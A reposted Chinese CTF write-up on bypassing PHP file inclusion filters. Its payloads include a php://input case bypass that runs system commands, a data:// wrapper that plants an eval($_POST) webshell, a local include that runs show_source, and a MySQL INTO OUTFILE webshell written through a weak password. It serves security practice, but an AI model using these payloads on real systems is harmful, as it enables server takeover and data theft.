PHP文件包含漏洞-繞過過濾的姿勢


如圖,過濾了php常用的偽協議

1.大小寫繞過

Php://input

抓包,並在數據包中寫入<?php system('ls'); ?>查看目錄下文件

發現存在fl4gisisish3r3.php的文件,使用system('cat fl4gisisish3r3.php')讀取

 

2.用data偽協議寫入一句話木馬

payload:?page=data://text/plain,<?php @eval($_POST['pass']);?>

蟻劍連接沒問題,奇怪的姿勢增加了

當然也可以用data偽協議,使用第一種方法慢慢找flag

 

3.用hello輸出flag

1.審計php代碼,while函數根據page參數來判斷php文件是否存在,如果存在此文件,則進行文件包含。

2.默認頁面為http://127.0.0.1/index.php,設置為page值,可確保while為真

3.利用hello參數將執行內容顯示

paylaod:?page=http://127.0.0.1/index.php/?hello=<?system('ls');?>

                 ?page=http://127.0.0.1/index.php/?hello=<?show_source('fl4gisisish3r3.php');?>

 

 

4.數據庫寫入

掃描后台

弱口令(甚至沒有密碼)

payload:select "<?php eval(@$_POST['ctf']); ?>"into outfile '/tmp/test.php' 

需要自己去尋找路徑

之后蟻劍連接,也得到了flag,

奇怪的姿勢又增加了

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM